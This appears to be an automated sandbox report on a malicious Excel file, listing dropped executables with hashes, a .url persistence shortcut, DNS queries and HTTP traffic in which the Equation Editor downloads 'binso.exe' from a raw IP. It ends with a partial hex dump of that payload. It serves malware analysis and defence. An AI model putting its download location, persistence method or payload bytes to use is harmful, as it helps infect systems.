                                                            Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\1020B0BE.txt
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.093292485947682
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2Lecw9zy/WVmxn:vEMWXLDwIe0n
                                                            MD5:ABD12F1C0B4E39B1BF5214FCD2A5AAAA
                                                            SHA1:DB75BD2BCF4EC9A53639CE6D5406DEEEFCFBC759
                                                            SHA-256:7F4C58DAE173EBFB0AC54F30037DE30C76188E758648E05B72755A9CA94C9C28
                                                            SHA-512:0F009E151266630E9268615E368D796B1D9B5D6B8EF197A3F359D7E934D1C194E36C07B7DA760D851A2CDE6111533531F777CEC91D8E29255F5239FE6DB8B452
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1789904384.30928171.1592555332.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NPAI0NCY.txt
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:Unknown
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.107301813326428
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2ESRWj9z6VcBn:vEMWXdWjrn
                                                            MD5:829EBDA80C973BEC9588898598992144
                                                            SHA1:FA0E07B5AAE0FB38E78D7F2843CC71B3B3159628
                                                            SHA-256:4B8AD7C735D6EDFF81FCDC15D0A0920EE4F25AEBA4C43CB62DB50FCC9E6B6C75
                                                            SHA-512:B98AAB1FF375056566FA5A01B41E7EB8C798C4646392B73B03B45AB8CF9153C011B328D2529BC10B7E039596A933896CF634CB30B123E6B58D78B34080DD193C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1879904384.30928171.1682686095.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\OG4AVE13.txt
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:Unknown
                                                            Category:downloaded
                                                            Size (bytes):64
                                                            Entropy (8bit):4.060985055808161
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2F7Sj9zWER0n:vEMWXF7wXR0n
                                                            MD5:65FC7145617D31840F0FAF6011948523
                                                            SHA1:D0BF6CD01FF08F18CBB65A43659EDE4A468494FC
                                                            SHA-256:1ADAFF33442C89AF0A9A6DB8A8F8C7C313BAEC1B4A3CED703B339233651D6D46
                                                            SHA-512:0BB7C10830BAE97DAE198F3B5F3448792D94BFA5B46BCC635BA6FA3FCF104109F4A3B3BE2CCCACC6AA3BA9BB89FB25ABE4D94CAA581F1CE5B9EB4FA638BE05AD
                                                            Malicious:false
                                                            Reputation:unknown
                                                            IE Cache URL:live.com/
                                                            Preview: wla42..live.com/.1536.1909904384.30928171.1713187734.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SKCEWK32.txt
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.130238235582062
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2L19zjQWiPxn:vEMWXL14xn
                                                            MD5:37B5D47F98EA3BCC813A2A012DA26F78
                                                            SHA1:80EB486A4CEE48FC96BE02E6C85F876C0DFB6285
                                                            SHA-256:670FD8BDC66132341984399409D169C956BA32A9A912997F995C210EA6DC83F9
                                                            SHA-512:58E599A14D73973A95D7A4ADB82776A58F8D16E0CFC59FBFAEBEEFBF3D33A70D99F4C055FC8F198E69499E2FA20570BA2A0082E7A1C5A7683799A6D3F2712A65
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1759904384.30928171.1563053827.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\TMLQ6DN1.txt
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.11496157888382
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2ITwdJ9zQiAR/W2Bn:vEMWXuuSiAR/W2Bn
                                                            MD5:191C207915FFCD42C751848D0D51F583
                                                            SHA1:CFD758449FF09D13B1CA44E1D27436DD3456E82D
                                                            SHA-256:7B0D70EC5CF82096B74488B579263F72425826488BC91EEC635A4AAF3D73B466
                                                            SHA-512:6EF868D388BF380C86DD8C0535986FEBFFD07454D3E905E62F1904314610BAA6EB5B927BC303A0F2BA65503D1443C3AB25EF879FF9C6D1046CF3728B9FDC2982
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1469904384.30928171.1276742542.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZVY3IDY2.txt
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.013551813326428
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2IctuJ9znvn:vEMWXQBn
                                                            MD5:61DB77F3FE957F222F97D77038C49FBB
                                                            SHA1:6895FC3D407837B379185E80F80888E138931421
                                                            SHA-256:016D9BD79DC2CC206FD1E604F5DDC3483D963EF381D22E9DD30C52C2B97BEA5B
                                                            SHA-512:6BC6A39FE8EF6E9C3C177A42E3952D86E872C4E5C41B8FE5190F43DA42782D9D40E66E24864EF8DE83BA282427ACB5365E91C0F58EA65CA741BE30407E7938C5
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1499904384.30928171.1310234302.30926839.*.
                                                            C:\Users\user\Desktop\~$7009.xlsx
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):1.4377382811115937
                                                            Encrypted:false
                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                            Malicious:true
                                                            Reputation:unknown
                                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            C:\Users\user\Odhbljup.exe
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):697856
                                                            Entropy (8bit):6.715864202909051
                                                            Encrypted:false
                                                            SSDEEP:12288:CIEpAb3iVUYfqUe+L7JMlbv7fkg48BcFcePyaW:CI8G3DYfq9+hMNTMz8Cbm
                                                            MD5:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            SHA1:2D0444EF8FE64348EEE4D748B0528E3799D18304
                                                            SHA-256:B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44
                                                            SHA-512:09205202F7CAB90141485DC55C9134E4438508DD78C4484E0212708CA2782F5C8431FD8044F38718146EB9D63A6C80FCFEB1F8B8BBEA1512C859463483C9FF10
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 36%
                                                            Reputation:unknown
                                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................!.......f...................0..lc........................... ......................................................CODE....\........................... ..`DATA................................@...BSS......................................idata...!......."..................@....tls.....................................rdata....... ......................@..P.reloc..lc...0...d..................@..P.rsrc....f.......f...@..............@..P....................................@..P........................................................................................................................................
                                                            C:\Users\user\pujlbhdO.url
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Odhbljup.exe">), ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77
                                                            Entropy (8bit):4.910351839735493
                                                            Encrypted:false
                                                            SSDEEP:3:HRAbABGQYmTWAX+6JwGwJPAJysGKd+Rov:HRYFVmTWD6JDwBAYsbnv
                                                            MD5:576781B47BF29FF0E3281E0DF79F44C1
                                                            SHA1:A6AC102F6E4397E9F6E5DAA395A72ED03C49B438
                                                            SHA-256:6F016734B2296FC4FC227D94D4976A43FB825F097294E3640F806482FAB6B397
                                                            SHA-512:3E33853AB8BA562B83F542A7840F4D16886FBD48E7B0DDA684B76245AFBC9CB675BF1EE87BD19466895B658158D50BB2CD176DB3165C7F8EA7E5B359AB446171
                                                            Malicious:false
                                                            Yara Hits:
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\pujlbhdO.url, Author: @itsreallynick (Nick Carr)
                                                            Reputation:unknown
                                                            Preview: [InternetShortcut]..URL=file:"C:\\Users\\user\\Odhbljup.exe"..IconIndex=64..
                                                            C:\Users\Public\vbc.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):697856
                                                            Entropy (8bit):6.715864202909051
                                                            Encrypted:false
                                                            SSDEEP:12288:CIEpAb3iVUYfqUe+L7JMlbv7fkg48BcFcePyaW:CI8G3DYfq9+hMNTMz8Cbm
                                                            MD5:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            SHA1:2D0444EF8FE64348EEE4D748B0528E3799D18304
                                                            SHA-256:B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44
                                                            SHA-512:09205202F7CAB90141485DC55C9134E4438508DD78C4484E0212708CA2782F5C8431FD8044F38718146EB9D63A6C80FCFEB1F8B8BBEA1512C859463483C9FF10
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 36%
                                                            Reputation:unknown
                                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................!.......f...................0..lc........................... ......................................................CODE....\........................... ..`DATA................................@...BSS......................................idata...!......."..................@....tls.....................................rdata....... ......................@..P.reloc..lc...0...d..................@..P.rsrc....f.......f...@..............@..P....................................@..P........................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:CDFV2 Encrypted
                                                            Entropy (8bit):7.971035071890227
                                                            TrID:
                                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                            File name:7009.xlsx
                                                            File size:234248
                                                            MD5:8305dc6702f80d7ebe34cd8c63297561
                                                            SHA1:db055cce075213d510de5ca9044ea76036dbcd07
                                                            SHA256:9eae576f7ecc05f106a7cfa605b1ca5bcd02c8d1c2c926920c0d7f0cb605b345
                                                            SHA512:4b79bcb14665fd34d42979e0364480ff2a9050d7700db3226393f5764350d3689b80431901bf275a80c60cf4d2be5e013fd2ab2de4d629a5ee826491c432b5ef
                                                            SSDEEP:6144:X4Har3eEPWQ9luDUtOh8xcx6iGWegiwrjsYLnXt:X4+TPWQ9Mx6gRiwrjrt
                                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                                            File Icon

                                                            Icon Hash:e4e2aa8aa4b4bcb4

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 2, 2021 19:33:54.980304003 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.143192053 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.143338919 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.143656969 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.306956053 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.306991100 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.307003021 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.307015896 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.307177067 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.469924927 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.469961882 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.469979048 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.469995022 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.470011950 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.470026970 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.470042944 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.470058918 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.470092058 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.470133066 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.470135927 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.632994890 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633028984 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633042097 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633054018 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633073092 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633094072 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633130074 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633151054 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633171082 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633191109 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633209944 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633222103 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.633229017 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633249998 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633260012 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.633263111 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.633270025 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.633271933 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633284092 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.633301020 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.633712053 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633738995 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.633768082 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.633779049 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.636750937 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796210051 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796266079 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796293974 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796330929 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796366930 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796400070 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796428919 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796435118 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796468973 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796472073 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796473026 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796519041 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796521902 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796555042 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796555996 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796588898 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796590090 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796626091 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796627045 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796660900 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796664953 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796698093 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796700001 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796734095 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796736002 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796768904 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796772003 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796803951 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796807051 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796838999 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796843052 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796911001 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796925068 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796962023 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796972990 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796998024 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796998978 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797036886 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797038078 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797072887 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797074080 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797106981 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797111034 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797144890 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797147989 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797178984 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797180891 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797218084 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797218084 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797254086 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797257900 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797288895 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797290087 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797322989 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797326088 CET804916713.250.31.113192.168.2.22

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 2, 2021 19:34:02.982615948 CET5216753192.168.2.228.8.8.8
                                                            Dec 2, 2021 19:34:04.865891933 CET5059153192.168.2.228.8.8.8
                                                            Dec 2, 2021 19:34:31.759788990 CET5780553192.168.2.228.8.8.8
                                                            Dec 2, 2021 19:34:33.459217072 CET5903053192.168.2.228.8.8.8
                                                            Dec 2, 2021 19:34:43.621721983 CET5918553192.168.2.228.8.8.8
                                                            Dec 2, 2021 19:34:45.487137079 CET5561653192.168.2.228.8.8.8
                                                            Dec 2, 2021 19:35:29.476387978 CET4997253192.168.2.228.8.8.8
                                                            Dec 2, 2021 19:35:29.516741037 CET53499728.8.8.8192.168.2.22
                                                            Dec 2, 2021 19:35:39.601691008 CET5177153192.168.2.228.8.8.8
                                                            Dec 2, 2021 19:35:39.997900963 CET53517718.8.8.8192.168.2.22

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Dec 2, 2021 19:34:02.982615948 CET192.168.2.228.8.8.80xac1cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                            Dec 2, 2021 19:34:04.865891933 CET192.168.2.228.8.8.80x85f5Standard query (0)prigmg.am.files.1drv.comA (IP address)IN (0x0001)
                                                            Dec 2, 2021 19:34:31.759788990 CET192.168.2.228.8.8.80x5b9bStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                            Dec 2, 2021 19:34:33.459217072 CET192.168.2.228.8.8.80x3d6fStandard query (0)prigmg.am.files.1drv.comA (IP address)IN (0x0001)
                                                            Dec 2, 2021 19:34:43.621721983 CET192.168.2.228.8.8.80x6b7dStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                            Dec 2, 2021 19:34:45.487137079 CET192.168.2.228.8.8.80x984cStandard query (0)prigmg.am.files.1drv.comA (IP address)IN (0x0001)
                                                            Dec 2, 2021 19:35:29.476387978 CET192.168.2.228.8.8.80x8eb8Standard query (0)www.urzeczenie.comA (IP address)IN (0x0001)
                                                            Dec 2, 2021 19:35:39.601691008 CET192.168.2.228.8.8.80xc18cStandard query (0)www.voucheraja.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Dec 2, 2021 19:34:03.014826059 CET8.8.8.8192.168.2.220xac1cNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:34:04.920044899 CET8.8.8.8192.168.2.220x85f5No error (0)prigmg.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:34:04.920044899 CET8.8.8.8192.168.2.220x85f5No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:34:31.788798094 CET8.8.8.8192.168.2.220x5b9bNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:34:34.308892965 CET8.8.8.8192.168.2.220x3d6fNo error (0)prigmg.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:34:34.308892965 CET8.8.8.8192.168.2.220x3d6fNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:34:43.643333912 CET8.8.8.8192.168.2.220x6b7dNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:34:45.507133007 CET8.8.8.8192.168.2.220x984cNo error (0)prigmg.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:34:45.507133007 CET8.8.8.8192.168.2.220x984cNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:35:29.516741037 CET8.8.8.8192.168.2.220x8eb8No error (0)www.urzeczenie.comurzeczenie.comCNAME (Canonical name)IN (0x0001)
                                                            Dec 2, 2021 19:35:29.516741037 CET8.8.8.8192.168.2.220x8eb8No error (0)urzeczenie.com87.98.234.164A (IP address)IN (0x0001)
                                                            Dec 2, 2021 19:35:39.997900963 CET8.8.8.8192.168.2.220xc18cNo error (0)www.voucheraja.comvoucheraja.comCNAME (Canonical name)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • 13.250.31.113
                                                            • www.urzeczenie.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.224916713.250.31.11380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 2, 2021 19:33:55.143656969 CET0OUTGET /7009/binso.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 13.250.31.113
                                                            Connection: Keep-Alive
                                                            Dec 2, 2021 19:33:55.306956053 CET1INHTTP/1.1 200 OK
                                                            Date: Thu, 02 Dec 2021 18:33:47 GMT
                                                            Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25
                                                            Last-Modified: Thu, 02 Dec 2021 09:01:28 GMT
                                                            ETag: "aa600-5d2260935ec6b"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 697856
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdownload
                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9e 05 00 00 04 05 00 00 00 00 00 10 ac 05 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0b 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0a 21 00 00 00 a0 06 00 00 66 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 6c 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 5c 9c 05 00 00 10 00 00 00 9e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 80 14 00 00 00 b0 05 00 00 16 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0d 00 00 00 d0 05 00 00 00 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 0a 21 00 00 00 e0 05 00 00 22 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 06 00 00 00 00 00 00 da 05 00 00 00 00 00 00 00 